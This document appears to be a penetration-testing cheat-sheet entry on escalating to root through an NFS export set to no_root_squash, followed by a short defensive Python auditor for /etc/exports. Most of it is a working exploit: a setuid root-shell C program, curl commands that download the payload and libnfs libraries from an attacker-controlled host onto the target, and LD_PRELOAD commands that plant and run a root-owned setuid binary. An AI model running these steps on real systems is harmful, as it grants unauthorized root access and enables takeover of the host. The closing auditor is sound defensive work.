tcp/2049 NFS no_root_squash/no_all_squash misconfiguration PE

  • Check vulnerability
> showmount -e 127.0.0.1
    Export list for 127.0.0.1:
    /srv/Share 127.0.0.1/32,10.1.1.0/24
> cat /etc/exports
    /srv/Share 10.1.1.0/24(insecure,rw)
    /srv/Share 127.0.0.1/32(no_root_squash,insecure,rw)
  • Build libnfs and its ld_nfs.so LD_PRELOAD example (the commands below run inside the libnfs source tree, which ships examples/ld_nfs.c)
> ./bootstrap
> ./configure
> make
> gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/
  • Create a simple exploit pwn.c and compile it: gcc pwn.c -o pwn
#include <stdlib.h>
#include <unistd.h>
int main(void){ setreuid(0,0); system("/bin/bash"); return 0; }
  • Transfer the compiled example (i.e. ld_nfs.so), the exploit (i.e. pwn) and the two libraries from the lib/.libs folder (i.e. libnfs.so, libnfs.so.13) to the target
> curl http://<ip>/pwn --output pwn
> curl http://<ip>/ld_nfs.so --output ld_nfs.so
> curl http://<ip>/libnfs.so --output libnfs.so
> curl http://<ip>/libnfs.so.13 --output libnfs.so.13
  • Copy the exploit into the export as uid 0 (LD_NFS_UID=0 through the preloaded ld_nfs.so), make it root-owned, world-executable and setuid, then run it from the server side
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so cp pwn nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chown root: nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://127.0.0.1/srv/Share/pwn

> /srv/Share/pwn
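As an added defender-side check that is not part of the original note: a small Python auditor that parses /etc/exports entries and flags the rw plus no_root_squash combination used above, the insecure option, and the easy-to-miss "host (opts)" spacing mistake that exports to every host. The sample exports content is constructed from the two lines shown earlier plus one extra line; it is not taken from a real host.

```python
import re

# /etc/exports syntax: "/path host1(opt,opt) host2(opt)". Defaults that matter here:
# root_squash (client uid 0 -> nobody) and secure (client source port must be < 1024).
_CLIENT = re.compile(r"^(?P<host>[^(\s]*)(?:\((?P<opts>[^)]*)\))?$")

def parse_exports(text):
    """Yield (path, host, options) for every client entry in exports-file content."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        if not clients:                               # bare path: exported to everyone
            clients = ["*"]
        for token in clients:
            m = _CLIENT.match(token)
            if m is None:
                continue
            # "host (opts)" with a space makes exportfs apply the options to all hosts,
            # so a token that is only "(opts)" is recorded against "*".
            host = m.group("host") or "*"
            opts = [o.strip() for o in (m.group("opts") or "").split(",") if o.strip()]
            yield path, host, opts

def audit_exports(text):
    """Return findings as (severity, path, host, reason) tuples, worst first."""
    findings = []
    for path, host, opts in parse_exports(text):
        root_kept, writable = "no_root_squash" in opts, "rw" in opts
        if root_kept and writable:   # the setuid-planting condition this page describes
            findings.append(("critical", path, host,
                             "rw + no_root_squash: client root can plant root-owned setuid files"))
        elif root_kept:
            findings.append(("high", path, host, "no_root_squash: client root reads as root"))
        if "insecure" in opts:
            findings.append(("medium", path, host,
                             "insecure: unprivileged source ports accepted, any local user can mount"))
        if host == "*":
            findings.append(("medium", path, host, "exported to every host"))
    rank = {"critical": 0, "high": 1, "medium": 2}
    return sorted(findings, key=lambda f: rank[f[0]])

# Constructed sample: the two exports shown on this page plus a loose-syntax line.
SAMPLE_EXPORTS = """\
/srv/Share 10.1.1.0/24(insecure,rw)
/srv/Share 127.0.0.1/32(no_root_squash,insecure,rw)
/srv/Public 10.1.1.0/24 (rw)   # space before '(' applies rw to every host
"""
```

Run it against a real file with audit_exports(open("/etc/exports").read()); the fix for the critical finding is to drop no_root_squash (or add all_squash) and re-export with exportfs -ra.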